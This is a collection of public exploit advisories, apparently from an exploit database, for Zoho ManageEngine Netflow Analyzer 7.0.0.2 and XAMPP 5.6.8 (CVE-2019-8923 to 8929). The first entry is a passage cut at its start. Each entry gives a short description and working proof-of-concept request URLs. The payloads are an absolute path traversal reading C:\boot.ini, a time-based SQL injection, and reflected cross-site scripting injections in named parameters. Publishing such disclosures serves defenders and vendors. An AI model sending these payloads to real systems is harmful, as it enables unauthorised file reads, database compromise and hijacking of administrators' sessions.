# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8925
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. An Absolute Path Traversal vulnerability in the Administration zone, in /netflow/servlet/CReportPDFServlet (via the parameter schFilePath), allows remote authenticated users to bypass intended SecurityManager restrictions and list a parent directory via any file name, such as a schFilePath=C:\boot.ini value.
2. Proof of Concept
Original request: http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\AdventNet\ME\NetFlow\help\ciscoQoS.pdf
http://X.X.X.X:8080/netflow/servlet/CReportPDFServlet?pdf=true&schFilePath=C:\boot.ini
3. Solution:
The product is discontinued. Update to last version this product.
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8926
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/popup1.jsp file via these GET parameters: bussAlert, customDev, and selSource.
2. Proof of Concept
http://localhost:8080/netflow/jspui/popup1.jsp?selSource=2&customDev=truer93f1%22%3e%3cscript%3ealert(1)%3c%2fscript%3efc8z7&bussAlert=true
Parameters: bussAlert, customDev and selSource
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8927
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/scheduleConfig.jsp file via these GET parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10, and val11.
2. Proof of Concept
http://localhost:8080/netflow/jspui/scheduleConfig.jsp?rowIncrement=true&match_flag=true&removeRows=&rep_Type=cust&schSource=interface&rep_schedule=daily&performTask=&disp=&stHr=09&edHr=17&filterFlag=false&selectDeviceDone=&devSrc=auxz6%22%3e%3cscript%3ealert(1)%3c%2fscript%3etqq9idmqry5&popup=false&task=add&f=&mset=&getFilter=false&resetter=true&excWeekModify=&mailReport=true&stH=09&edH=17&boxChecked0=&selCh0=&threshRow=1&schName=www&schDesc=qqq&sourcesel=40&repType=cust&logicOp=AND&sel0=SrcAddr&val10=&rowCount=1&repSchedule=Daily&dailysel1=02&dailysel2=00&dailysel3=1&dmsg=&weeklysel1=1&weeklysel2=02&weeklysel3=00&weeklysel4=3&monthsel1=1&monthsel2=02&monthsel3=00&monthlysel4=5&repGenTime=2019-02-18+14%3A55&oncesel4=1&omsg=&mailreport=mailreport&emailId=
Parameters: devSrc, emailId, excWeekModify, filterFlag, getFilter, mailReport, mset, popup, rep_schedule, rep_Type, schDesc, schName, schSource, selectDeviceDone, task, val10 and val11
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8928
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in /netflow/jspui/userManagementForm.jsp via these GET parameters: authMeth, passWord, pwd1, and userName.
2. Proof of Concept
http://localhost:8080/netflow/jspui/userManagementForm.jsp?moveLR=&moveRL=&moveLRIP=&moveRLIP=&moveLRBuss=&moveRLBuss=&addField=&authMeth=fgcuh%3e%3cscript%3ealert(1)%3c%2fscript%3eyxcpve1able&createRadUser=false&radSet=&userName=qqq&radiusUser=Authenticate+locally&pwd1=qqqqqq&passWord=qqqqqq&priv=Guest
Parameters: authMeth, passWord, pwd1 and userName
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: Cross Site Scripting in Zoho ManageEngine Netflow Analyzer Professional v7.0.0.2 Administration zone
# Date: 31-01-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.manageengine.com/products/netflow/?doc
# Software Link: https://www.manageengine.com/products/netflow/?doc
# Version: Netflow Analyzer Professional v7.0.0.2 Administration zone
# Tested on: all
# CVE : CVE-2019-8929
# Category: webapps
1. Description
An issue was discovered in Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2. XSS exists in the Administration zone /netflow/jspui/selectDevice.jsp file in these GET parameters: param and rtype.
2. Proof of Concept
http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=collopts¶m=g3oxp%22%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C%2fscript%3E%3C!--q5uad
Parameters: param and rtype
3. Solution:
Update to last version this product.
Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
<!--
# Exploit Title: SQL injection in XAMPP 5.6.8 (and previous)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.8
# Tested on: All
# CVE : CVE-2019-8923
# Category: webapps
1. Description
XAMPP through 5.6.8 allows SQL injection via the cds-fpdf.php jahr parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous).
2. Proof of Concept
http://localhost/xampp/cds-fpdf.php?interpret=SQLi&titel=SQLi&jahr=1984%20%20AND%20sleep%285%29
3. Solution:
The product is discontinued. Update to last version.
Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->
<!--
# Exploit Title: Cross Site Scripting in XAMPP 5.6.8 (and previous)
# Date: 17-02-2019
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
# Version: XAMPP 5.6.8
# Tested on: All
# CVE : CVE-2019-8924
# Category: webapps
1. Description
XAMPP through 5.6.8 allows XSS via the cds-fpdf.php interpret or titel parameter. NOTE: This product is discontinued. Affected Product Code Base XAMPP 1.8.2 (and previous).
2. Proof of Concept
First Request (not filter the characters's content): http://X.X.X.X/xampp/cds.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
or Request: http://localhost/xampp/cds.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
Second Request (to xss attack): http://X.X.X.X/xampp/cds-fpdf.php
http://localhost/xampp/cds-fpdf.php?interpret=XSS&titel=<script>alert("XSS")</script>&jahr=1984
http://localhost/xampp/cds-fpdf.php?interpret=<script>alert("XSS")</script>&titel=XSS&jahr=1984
When cds-fpdf.php is loaded not filter the characters: <b><script>alert("XSS")</script></b></td><td class=tabval>
cds.php filter it: <td class=tabval><b><script>alert("XSS"</script></b></td><td class=tabval>
3. Solution:
The product is discontinued. Update to last version.
Reference:
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/1.8.2/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.5.19/
https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/5.6.8/
-->